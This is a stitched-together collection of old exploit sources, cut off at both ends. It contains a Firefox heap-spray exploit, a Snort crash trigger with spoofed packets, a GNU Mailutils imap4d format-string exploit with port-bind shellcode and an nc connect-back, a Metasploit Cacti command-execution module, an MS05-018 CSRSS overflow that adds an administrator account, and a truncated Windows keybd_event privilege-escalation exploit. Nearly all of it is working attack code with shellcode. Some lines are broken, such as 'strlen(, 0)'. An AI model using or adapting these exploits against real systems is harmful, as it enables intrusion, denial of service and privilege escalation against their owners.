"Shellcode size: " + number(sShellcode.length*2) + " bytes.<BR>" +
"Heap blocks size: " + number(iHeapBlockSize) + " bytes.<BR>" +
"<SPAN id=\"heapBlockStatus\">" +
"Allocating " + number(iHeapBlockCount) + " heap blocks...<BR>" +
"<DIV style=\"border:1px solid black; background:#808080; " +
"width:500px;\"><DIV style=\"text-align:right; " +
"border-right:1px solid black; background:#00FF00;\" " +
"id=\"progressBar\">0</DIV></DIV>" +
"</SPAN>" +
"<SPAN id=\"exploitStatus\"></SPAN>"
);
var heapBlockStatusElement = document.getElementById("heapBlockStatus");
var progressBarElement = document.getElementById("progressBar");
var exploitStatusElement = document.getElementById("exploitStatus");

var asHeapBlocks = new Array();

// The next part uses timeouts to run in the background.
createHeapBlock();
function createHeapBlock() {
if (asHeapBlocks.length < iHeapBlockCount) {
// Create a heap block --------------------------------------------
asHeapBlocks.push(sNopslide + '' + sShellcode);
var percentageDone = Math.round(
100*asHeapBlocks.length/iHeapBlockCount
);
progressBarElement.innerHTML =
"<NOBR>" +
bytes(asHeapBlocks.length*asHeapBlocks[0].length*2) +
"</NOBR>";
progressBarElement.style.width = percentageDone + "%";
setTimeout(arguments.callee, 10);
} else {
// Done creating heap blocks --------------------------------------
// Show stats
heapBlockStatusElement.innerHTML =
"Heap blocks count: " + asHeapBlocks.length + ".<BR>" +
"Total heap consumption: " +
bytes(asHeapBlocks.length*asHeapBlocks[0].length*2) +
".<BR>" +
"Elapsed time: " +
time(new Date() - startDate) + ".<HR>" +
"<H2>Exploit</H2>" +
"Attack URL (size: " +
number(sURL.length*2) + " bytes):<BR>" +
"&quot;" + escape(sURL) + "&quot;<BR><BR>";
// Ask if you want to get pwned
exploitStatusElement.innerHTML =
"<BUTTON onclick=\"FiredFox();\">" +
"Click here if you want to run the actual exploit" +
"</BUTTON>";
}
} // createHeapBlock()
function FiredFox() {
exploitStatusElement.innerHTML =
"Running exploit code...<BR>" +
"(It may take some time before the exploit works. You should " +
"see a progress bar below. If it stops, it either worked and a " +
"shell is waiting for you at port 28876 or your browser has " +
"gone into an infinite loop).<BR>";
setInterval(function() {
var oElement = new Image();
oElement.src = sURL+""; // This is where we abuse the flaw.
oElement.border = 1;
oElement.width = 1;
oElement.height = 10;
document.body.appendChild(oElement);
}, 1);
} // FiredFox()

function number(iValue) {
// Returns a "pretty" string representation of a number:
// number(1000000.5) == "1,000,000.5"
var sResult = "" + iValue;

for (var sResult = ""; iValue > 0; iValue = Math.floor(iValue/1000)) {
sResult = (iValue % 1000) +
(sResult.length > 0 ? "," + sResult : "");
if (iValue > 1000 && sResult.length % 4 < 3)
sResult = "0" + sResult;
}
return sResult;
} // number()

function bytes(iValue) {
// Returns a "pretty" string representation of a number of bytes:
// bytes(1000000.5) == "976.57 KB"
var aUnits = new Array(
"Bytes", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB"
);
for (var i = 0; iValue > 1024; i++, iValue /= 1024) {}
sResult = number(Math.ceil(iValue * 100) / 100) + // Two decimals
" " + aUnits[i]
return sResult;
}// bytes()
function time(iValue) {
// Returns a "pretty" string representation of an elapsed number of
// milliseconds:
// time(1000000.5) == "16m 40s 1?s"
var aUnits = new Array(
new Array(1000, unescape("%u03BCs")),
new Array(60, "s"),
new Array(60, "m"),
new Array(24, "h"),
new Array(7, "d"),
new Array(52, "y")
);
sResult = "";

for(var i=0; iValue > 0 && i<aUnits.length; i++) {
var iSize = aUnits[i][0], sUnit = aUnits[i][1];
sResult = Math.round(iValue % iSize) + sUnit +
(i>0 ? " " : "") + sResult;
iValue = Math.floor(iValue / iSize);
}
return sResult;
} // time()
</SCRIPT></HTML>

/*_----------------------------------------------
||------+ Snort <= 2.4.0 Trigger p0c +-------
||___________________________________
||--=[ nitrous [at] vulnfact [dot] com ]=--
||--=[ VulnFact Security Labs ]=--
||--=[ 21 Ago 2oo5 ]=--
||--=[ Mexico ]=--
||__________________________________________
-__________________________________________-

Snort <= 2.4.0 SACK TCP Option Error Handling
Este c��o envia al especificado un paquete TCP/IP con 4 bytes extras
correspondientes al campo TCP Options [TCP Header].
Estos 4 bytes son "\x05\x02\x00\x00". NOTA !!!: Snort solamente cae cuando se
esta corriendo en verbose mode (-v).

Esto solo funciona testeando de una maquina a otra directamente conectadas
(1 solo salto; Ej. En una red LAN de PC a PC). No funciona desde Internet, por
que el campo TCP->th_sum es 0 (cero), por lo tanto, el primer Router por donde
pase este paquete lo descartara por no tener una checksum valida.

RFC #1072 - TCP Extensions for Long-Delay Paths

3.2- TCP SACK Option:
...
Kind: 5
Length: Variable
+--------+--------+--------+--------+--------+--------+
| Kind=5 | Length | Relative Origin | Block Size |
+--------+--------+--------+--------+--------+--------+

Analizando el packete con 'tcpdump' en OpenBSD 3.5 vemos:
11:17:53.093264 ip: 127.0.0.1.29383 > 127.0.0.1.80: S 213975407:213975407(0) win 5840
<malformed sack [len 0] ,eol>
0000: 4500 002c bc4f 0000 ff06 017a 7f00 0001 E..,ŒO..ÿ..z....
0010: 7f00 0001 72c7 0050 0cc1 016f 43f1 8422 ....rÇ.P.Á.oCñ."
0020: 6002 16d0 3caf 0000 0502 0000 `..Ð<¯......

Testeado en:
[+] snort 2.4.0 @ OpenBSD 3.7 GENERIC // Yeah
[+] snort 2.4.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.3.2 @ Debian Linux 3.1 "Sarge"
[+] snort 2.3.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.3.0 @ Red Hat Linux 9
[+] snort 2.2.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.0.0 @ OpenBSD 3.5 GENERIC

Saludos a vulnfact.com, CRAc, stacked, ran, dex, benn, beck, zlotan, Rowter, Gus, Crypkey,
protoloco, Falckon, dymitri, #cum ppl, warlord/nologin.org por fuzzball2 fuzzer, gcarrillog,
JSS, y en especial a Mariit@ ( Sexy Colombiana ). A la musica de "Sussie 4" ...
Federico L. Bossi Bonin
*/

#include<stdio.h>
#include<string.h>
#include<unistd.h>
#include<errno.h>
#include<netdb.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
//#define __USE_BSD 1 /* Use BSD's ip header style */
#include<netinet/ip.h>
#define __FAVOR_BSD 1 /* Use BSD's tcp header style */
#include<netinet/tcp.h>

#define IPSIZE sizeof(struct ip)
#define TCPSIZE sizeof(struct tcphdr)
#define DEFAULT_SRC_IP "200.31.33.70"

char trigger[] = "\x05\x02\x00\x00"; /* Malformed SACK TCP Option */

int usage(char *name)
{
fprintf(stderr, "Usage: %s <target> [spoofed srcip]\n", name);
fprintf(stderr, "\t\tDefault srcip = %s\n", DEFAULT_SRC_IP);

return 0;
}

int main(int argc, char **argv)
{
char *packet= (char *) malloc(IPSIZE + TCPSIZE + 4);
char *srcip = DEFAULT_SRC_IP;
int sockfd, count;
int one = 1; /* setsockopt() */
struct sockaddr_in target;
struct hostent *host2ip;
struct ip *IP = (struct ip *) packet;
struct tcphdr *TCP = (struct tcphdr *) (packet + IPSIZE);

if(argc < 2)
return(usage(*argv));

if(argc == 3)
srcip = argv[2];

if((host2ip = gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(-1);
}

if(getuid() != 0){
fprintf(stderr, "Ups!, must be r00t to perform RAW sockets\n");
exit(-1);
}

memset(packet, 0x00, sizeof(packet));

memset(&target, 0x00, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(64876);
target.sin_addr = *((struct in_addr *)host2ip->h_addr);

/*** BUILDING MALFORMED PACKET ***/
IP->ip_hl = 0x05;
IP->ip_v = 0x04;
IP->ip_tos = 0x00;
IP->ip_len = IPSIZE + TCPSIZE + 4;
IP->ip_id = 0x00;
IP->ip_off = 0x00;
IP->ip_ttl = 0xff;
IP->ip_p = IPPROTO_TCP;
IP->ip_sum = 0x00;
IP->ip_src.s_addr = inet_addr(srcip);
IP->ip_dst.s_addr = target.sin_addr.s_addr;

TCP->th_sport = htons(31337);
TCP->th_dport = target.sin_port;
TCP->th_seq = 0x00;
TCP->th_ack = 0x00;
TCP->th_x2 = 0x00;
TCP->th_off = 0x06;
TCP->th_flags = 0x00; /* NO Syn */
TCP->th_win = htons(0xffff);
TCP->th_sum = 0x00;
TCP->th_urp = 0x00;

memcpy(packet + IPSIZE + TCPSIZE, trigger, 4);
/*** END ***/

if((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1){
perror("socket");
exit(-1);
}

if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1){
perror("setsockopt");
exit(-1);
}

printf("-=[ Snort <= 2.4.0 Trigger p0c\n");
printf("-=[ By nitr0us <nitrous[at]vulnfact[dot]com>\n\n");
printf("-=[ Sending Malformed TCP/IP Packet...\n");

if((count = sendto(sockfd, packet, IP->ip_len, 0, (struct sockaddr *)&target, sizeof(target))) == -1){
perror("sendto");
close(sockfd);
exit(-1);
}

printf("-=[ Sent %d bytes to %s\n", count, argv[1]);
printf("-=[ Snort killed !\n");

close(sockfd);
return 0;
}

/*
* GNU Mailutils 0.6 imap4d 'search' format string exploit.
* Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
*
* $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
* [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
* [+] By clem1.
* [+] connecting to: 127.0.0.1:143
* [+] authentification: completed.
* [+] format string: sended
* [+] shellcode sended.
* [+] Bingo.
*
* id;
* uid=1000(clem1) gid=1002(mail) groups=0(root)
*
* Copyright © 2005 Cl魥nt Lecigne - clem1 @ badcode.info.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

struct values {
int offset;
int IO_file_close;
int addr;
char mailbox[32];
} v = {
11,
0x40468bc4,
0x80906e0, //0xaabbccdd
"inbox"
};

void usage(char *);
void auth(int, char *, char *);
void sendsc(int);
void owned(int, char *);
void fmtbuild(int);

/*
* s0t4ipv6@Shellcode.com.ar
* x86 portbind a shell in port 5074
*/
char sc[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40"
"\x50\x89\xe1\xb0\x66\xcd\x80\x31"
"\xd2\x52\x66\x68\x13\xd2\x43\x66"
"\x53\x89\xe1\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x40\x89\x44"
"\x24\x04\x43\x43\xb0\x66\xcd\x80"
"\x83\xc4\x0c\x52\x52\x43\xb0\x66"
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd"
"\x80\x41\x80\xf9\x03\x75\xf6\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x52\x53\x89\xe1"
"\xb0\x0b\xcd\x80";

char b[1024];
int i;

int main(int ac, char **av){
char o, *host, *user, *pass;
struct hostent *h;
struct sockaddr_in s;
int port, fd;

puts("[+] GNU Mailutils 0.6 imap4d 'search' format string exploit.");
puts("[+] By clem1.");

if(ac != 9) usage(av[0]);

while((o = getopt(ac,av,"h:p:u:s:")) != EOF) {
switch (o) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'u':
user = optarg;
break;
case 's':
pass = optarg;
break;
default:
usage(av[0]);
break;
}
}
if((h = gethostbyname(host)) == NULL) {
herror("[-] gethostbyname()");
exit(1);
}

printf("[+] connecting to: %s:%d\n", inet_ntoa(*((struct in_addr *)h->h_addr)), port);

fd = socket(AF_INET, SOCK_STREAM, 0);
if(fd == -1){
perror("[-] socket()");
exit(1);
}

s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr = *((struct in_addr *)h->h_addr);
bzero(&(s.sin_zero), 8);

if (connect(fd, (struct sockaddr *)&s, sizeof s) == -1) {
perror("[-] connect()");
exit(1);
}

i = recv(fd, b, 1023, 0);
b[i] = 0;
if(strstr(b, "IMAP4rev1") == NULL){
puts("[-] failled.");
exit(1);
}
/* authentification. */
auth(fd, user, pass);
/* build and send evil format string. */
fmtbuild(fd);
/* store shellcode in imap4d rwx adresse space. */
sendsc(fd);
/* force a call to fclose, uhm no shellcode ;> */
owned(fd, host);
return 0;
}

void auth(int fd, char *user, char *pass){
memset(b, 0x0, 1024);
snprintf(b, 1023, "1 LOGIN \"%s\" \"%s\"\n", user, pass);
if(send(fd, b, strlen(, 0) == -1){
perror("[-] send()");
exit(1);
}
memset(b, 0x0, 1024);
i = recv(fd, b, 1023, 0);
b[i] = 0x0;
if(strstr(b, "Completed") == NULL){
puts("[-] LOGIN failled.");
exit(1);
}
memset(b, 0x0, 1024);
snprintf(b, 1023, "2 SELECT \"%s\"\n", v.mailbox);
if(send(fd, b, strlen(, 0) == -1){
perror("[-] send()");
exit(1);
}
memset(b, 0x0, 1024);
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "Completed") != NULL)
break;
if(strstr(b, "Couldn't") != NULL){
puts("[-] SELECT failled.");
exit(1);
}
}
puts("[+] authentification: completed.");
return;
}

void sendsc(int fd){
memset(b, 0x41, 1024);
memcpy(b + 900, sc, strlen(sc));
memcpy(b + 1020, " A\n", 3);
memcpy(b, "3 LIST ", 7);
if(send(fd, b, strlen(, 0) == -1){
perror("[-] send()");
exit(1);
}
memset(b, 0x0, 1024);
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "Completed") != NULL)
break;
if(strstr(b, "BAD") != NULL){
puts("[-] LIST failled.");
exit(1);
}
}
puts("[+] shellcode sended.");
return;
}

void fmtbuild(int fd){
unsigned char b0, b1, b2, b3;
int a1, a2;
a1 = (v.addr & 0xffff0000) >> 16;
a2 = (v.addr & 0x0000ffff);
b0 = (v.IO_file_close >> 24) & 0xff;
b1 = (v.IO_file_close >> 16) & 0xff;
b2 = (v.IO_file_close >> 8) & 0xff;
b3 = (v.IO_file_close) & 0xff;
snprintf(b, sizeof b, "3 SEARCH TOPIC "
"A" /* pad. */
"%c%c%c%c"
"%%.%hdx"
"%%%d$hn\n",
b3 + 2, b2, b1, b0,
a1 - 0x24,
v.offset);
if(send(fd, b, strlen(, 0) == -1){
perror("[-] send()");
exit(1);
}
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "BAD") != NULL)
break;
}
memset(b, 0x0, 1024);
snprintf(b, sizeof b, "3 SEARCH TOPIC "
"A" /* pad. */
"%c%c%c%c"
"%%.%hdx"
"%%%d$hn\n",
b3, b2, b1, b0,
a2 - 0x24,
v.offset);
if(send(fd, b, strlen(, 0) == -1){
perror("[-] send()");
exit(1);
}
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "BAD") != NULL)
break;
}
puts("[+] format string: sended");
return;
}

void owned(int fd, char *host){
memset(b, 0x0, 1024);
snprintf(b, 1023, "3 SUBSCRIBE OWNED\n");
if(send(fd, b, strlen(, 0) == -1){
perror("[-] send()");
exit(1);
}
puts("[+] Bingo.\n");
sleep(1);
execl("/bin/nc", "prout", host, "5074", NULL);
printf("[-] muh? where is nc?\n[+] A shell is waiting you on %s:5074.\n", host);
return;
}

void usage(char *ex){
printf("usage: %s -h <hostname> -p <port> -u <user> -s <password>\n", ex);
exit(1);
}

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::cacti_graphimage_exec;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'Cacti graph_image.php Remote Command Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'David Maciejak <david dot maciejak at kyxar dot fr>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'DIR' => [1, 'DATA', 'Directory of cacti', '/cacti/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary command execution vulnerability in the
Raxnet Cacti threw graph_image.php script. Cacti version to 0.8.6-d are vulnerable.
}),
'Refs' =>
[
['BID', '14042'],
],

'Payload' =>
{
'Space' => 128,
'Keys' => ['cmd','cmd_bash'],
},

'Keys' => ['cacti'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $dir = $self->GetVar('DIR');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $cmd = $encodedPayload->RawPayload;


$cmd = $self->URLEncode($cmd);

my $listgraph = $dir.'graph_view.php?action=list';
my $requestlist =
"GET $listgraph HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: ".$self->VHost.":$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine("[*] Establishing a connection to the target to get list of valid image id ...");

$s->Send($requestlist);

my $resultslist = $s->Recv(-1, 20);
$s->Close();

$resultslist=~m/local_graph_id=(.*?)&/ || $self->PrintLine
("[*] Unable to retrieve a valid image id") && return;

my $valid_graph_id=$1;

$dir = $dir.'graph_image.php?local_graph_id='."$valid_graph_id".'&
graph_start=%0aecho;echo%20YYY;'."$cmd".';echo%20YYY;echo%0a';

my $request =
"GET $dir HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: ".$self->VHost.":$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

$s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine("[*] Establishing a connection to the target to execute command ...");

$s->Send($request);

my $results = $s->Recv(-1, 20);

if ($results=~ /^transfer-encoding:[ \t]*chunked\b/im){

(undef, $results) = split(/YYY/, $results);

my @results = split ( /\r\n/, $results );

chomp @results;

for (my $i = 2; $i < @results; $i += 2){
$self->PrintLine('');
$self->PrintLine("$results[$i]");
}
} else {

(undef, $results) = split(/YYY/, $results);

my @results = split ( /\r\n/, $results );

chomp @results;
$self->PrintLine("[*] Target may be not vulnerable");
$self->PrintLine("$results");
}

$s->Close();
return;
}

sub URLEncode {
my $self = shift;
my $data = shift;
my $res;

foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}

sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;
}

1;

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

#pragma comment (lib,"Advapi32.lib")

typedef struct _CONSOLE_STATE_INFO {
/* 0x00 */ DWORD cbSize;
/* 0x04 */ COORD ScreenBufferSize;
/* 0x08 */ COORD WindowSize;
/* 0x0c */ POINT WindowPosition;
/* 0x14 */ COORD FontSize;
/* 0x18 */ DWORD FontFamily;
/* 0x1c */ DWORD FontWeight;
/* 0x20 */ WCHAR FaceName[0x200];
} CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;

typedef struct xxx
{
DWORD dw[6];
char cmd[0x50];
}address_and_cmd;

char decoder[]=
"\x8b\xdc"
"\xBE\x44\x59\x41\x53\x46\xBF\x44\x59\x34\x53\x47\x43\x39\x33\x75"
"\xFB\x83\xC3\x04\x80\x33\x97\x43\x39\x3B\x75\xF8\x45\x59\x41\x53";
//user=e
//pass=asd#321
char add_user[]=
"\x90\x90\x90\x90\x90\x90\x90\x8D\x7b\x98\xFF\x77\x14\x6A\x00\x68"
"\x2A\x04\x00\x00\xFF\x17\x8B\xD8\x6A\x04\x68\x00\x10\x00\x00\x68"
"\x00\x01\x00\x00\x6A\x00\x53\xFF\x57\x04\x8B\xF0\x6A\x00\x68\x00"
"\x01\x00\x00\x8D\x47\x18\x50\x56\x53\xFF\x57\x08\x33\xC0\x50\x50"
"\x56\xFF\x77\x10\x50\x50\x53\xFF\x57\x0C";
char decode_end_sign[]="EY4S";
char sc[0x200];

char szConsoleTitle[256];

DWORD search_jmpesp()
{
char szDLL[][30] = {"ntdll.dll",
"kernel32.dll",
"user32.dll",
"gdi32.dll",
"winsrv.dll",
"csrsrv.dll",
"basesrv.dll"};
int i,y;
BOOL done;
HMODULE h;
BYTE *ptr;
DWORD addr=0;

for(i=0;i<sizeof(szDLL)/sizeof(szDLL[0]);i++)
{
done = FALSE;
h = LoadLibrary(szDLL[i]);
if(h == NULL)
continue;
printf("[+] start search \"FF E4\" in %s\n", szDLL[i]);
ptr = (BYTE *)h;
for(y = 0;!done;y++)
{
__try
{
if(ptr[y] == (BYTE)'\xFF' && ptr[y+1] == (BYTE)'\xE4')
{
addr = (int)ptr + y;
done = TRUE;
printf("[+] found \"FF E4\"(jmp esp) in %X[%s]\n", addr, szDLL[i]);
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
done = TRUE;
}
}
FreeLibrary(h);
if(addr) break;
}
return addr;
}
BOOL make_shellcode(DWORD dwTargetPid)
{
HMODULE hKernel32;
address_and_cmd aac;
int i=0, j=0, size=0;

hKernel32 = LoadLibrary("kernel32.dll");
if(!hKernel32) return FALSE;
aac.dw[0] = (DWORD)GetProcAddress(hKernel32, "OpenProcess");
aac.dw[1] = (DWORD)GetProcAddress(hKernel32, "VirtualAllocEx");
aac.dw[2] = (DWORD)GetProcAddress(hKernel32, "WriteProcessMemory");
aac.dw[3] = (DWORD)GetProcAddress(hKernel32, "CreateRemoteThread");
aac.dw[4] = (DWORD)GetProcAddress(hKernel32, "WinExec");
aac.dw[5] = dwTargetPid;

memset(aac.cmd, 0, sizeof(aac.cmd));
strcpy(aac.cmd, "cmd /c net user e asd#321 /add && net localgroup administrators e /add");

//encode
strcpy(sc, decoder);
for(i=0;i<sizeof(add_user);i++)
add_user[i]^=(BYTE)'\x97';
strcat(sc, add_user);
for(i=0;i<sizeof(aac);i++)
((char *)&aac)[i]^=(BYTE)'\x97';
size=strlen(sc);
memcpy(&sc[size], (char *)&aac, sizeof(aac));
size+=sizeof(aac);
sc[size]='\x0';
strcat(sc, decode_end_sign);

return TRUE;
}

void exploit(HWND hwnd, DWORD dwPid)
{
HANDLE hFile;
LPVOID lp;
int i, index;
DWORD dwJMP;
CONSOLE_STATE_INFO csi;


memset((void *)&csi, 0, sizeof(csi));
csi.cbSize = sizeof(csi);
csi.ScreenBufferSize.X = 0x0050;
csi.ScreenBufferSize.Y = 0x012c;
csi.WindowSize.X = 0x0050;
csi.WindowSize.Y=0x0019;
csi.WindowPosition.x = 0x58;
csi.WindowPosition.y = 0x58;
csi.FontSize.X = 0;
csi.FontSize.Y=0xc;
csi.FontFamily = 0x36;
csi.FontWeight = 0x190;

for(i=0;i<0x58;i++)
((char *)csi.FaceName)[i] = '\x90';
dwJMP = search_jmpesp();
if(!dwJMP)
{
printf("[-] search FF E4 failed.\n");
return;
}
memcpy(&((char *)csi.FaceName)[0x58], (char *)&dwJMP, 4);
for(i=0;i<0x20;i++)
strcat((char *)csi.FaceName, "\x90");
index = strlen((char *)csi.FaceName);

if(!make_shellcode(dwPid)) return;
memcpy(&((char *)csi.FaceName)[index], (char *)sc, strlen(sc));

hFile = CreateFileMappingW((void *)0xFFFFFFFF,0,4,0,csi.cbSize,0);
if(!hFile)
{
printf("[-] CreateFileMapping failed:%d\n", GetLastError());
return;
}
printf("[+] CreateFileMapping OK!\n");
lp = MapViewOfFile(hFile, 0x0F001F,0,0,0);
if(!lp)
{
printf("[-] MapViewOfFile failed:%d\n", GetLastError());
return;
}
printf("[+] MapViewOfFile OK!\n");
//copy
memcpy((unsigned short *)lp, (unsigned short *)&csi, csi.cbSize);

printf("[+] Send Exploit!\n");
SendMessageW(hwnd,0x4C9,(WPARAM)hFile,0);
}

void main(int argc, char **argv)
{
DWORD dwRet;
HWND hwnd = NULL;
DWORD dwPid = 0;
HANDLE hSnapshot = NULL;
PROCESSENTRY32 pe;

printf( "MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0\n"
"Affect: Windows 2000 sp3/sp4 (all language)\n"
"Coded by eyas <eyas at xfocus.org>\n"
"http://www.xfocus.net\n\n");

if(argc==2)
{
dwPid = atoi(argv[1]);
}
else
{
printf("Usage: %s pid\n\n", argv[0]);
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
if( strcmpi(pe.szExeFile, "WINLOGON.EXE") == 0)
{
printf("[+] PID=%d Process=%s\n", pe.th32ProcessID, pe.szExeFile);
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle (hSnapshot);
}

if(!dwPid) return;

if(!FreeConsole())
printf("[-] FreeConsole failed:%d\n", GetLastError());
else
{
printf("[+] FreeConsole ok.\n");
if(!AllocConsole())
printf("[-] AllocConsole failed:%d\n", GetLastError());
else
printf("[+] AllocConsole ok.\n");
}

dwRet = GetConsoleTitle(szConsoleTitle, sizeof(szConsoleTitle));
if(dwRet)
{
printf("[+] Get Console Title OK:\"%s\"\n", szConsoleTitle);
}
else
{
printf("[-] Get Console Title failed.\n");
return;
}

hwnd = FindWindow("ConsoleWindowClass",szConsoleTitle);
if(hwnd)
printf("[+] bingo! found hwnd=%X\n", hwnd);
else
{
printf("[-] can't found hwnd!\n");
return;
}

exploit(hwnd, dwPid);
printf("[+] Done.\n");
}

/*
* Microsoft Windows keybd_event validation vulnerability.
* Local privilege elevation
*
* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
* I�� Lopez ( ilo _@_ reversing.org <http://reversing.org> )
*
* Platforms afected/tested:
*
* - Windows 2000
* - Windows XP
* - Windows 2003
*
*
* Original Advisory: http://www.haxorcitos.com
* http://www.reversing.org
*
* Exploit Date: 08 / 06 / 2005
*
* Orignal Advisory:
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Attack Scenario:
*
* a) An attacker who gains access to an unprivileged shell/application executed
* with the application runas.
* An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
*
* Impact:
*
* Due to an invalid keyboard input validation, its possible to send keys to any
* application of the Desktop.
* By sending some short-cut keys its possible to execute code and elevate privileges
* getting loggued user privileges and bypass runas/service security restriction.
*
* Exploit usage:
*
* C:\>whoami
* AQUARIUS\Administrador
*
* C:\>runas /user:restricted cmd.exe
* Enter the password for restricted:
* Attempting to start cmd.exe as user "AQUARIUS\restricted" ...
*
*
* Microsoft Windows 2000 [Version.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>cd \
*
* C:\>whoami
* AQUARIUS\restricted
*
* C:\>tlist.exe |find "explorer.exe"
* 1140 explorer.exe Program Manager
*
* C:\>c:\keybd.exe 1140
* HANDLE Found. Attacking =)
*
* C:\>nc localhost 65535
* Microsoft Windows 2000 [Versi��.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\>whoami
* whoami
* AQUARIUS\Administrador
*
*
* DONE =)
*
*/


#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")


#define HAXORCITOS 65535
unsigned int pid = 0;
char buf[256]="";


/**************************************************************/
void ExplorerExecution (HWND hwnd, LPARAM lParam){
DWORD hwndid;
int i;



GetWindowThreadProcessId(hwnd,&hwndid);


if (hwndid == pid){
/*
Replace keybd_event with SendMessage() and PostMessage() calls
*/
printf("HANDLE Found. Attacking =)\n");
SetForegroundWindow(hwnd);
keybd_event(VK_LWIN,1,0,0);
keybd_event(VkKeyScan('r'),1,0,0);
keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
for(i=0;i<strlen(buf);i++) {
if (buf[i]==':') {
keybd_event(VK_SHIFT,1,0,0);
keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
} else {
if (buf[i]=='\\') {
keybd_event(VK_LMENU,1,0,0);
keybd_event(VK_CONTROL,1,0,0);
keybd_event(VkKeyScan('?'),1,0,0);
keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0);
keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('?'),1,KEYEVENTF_KEYUP,0);
} else {
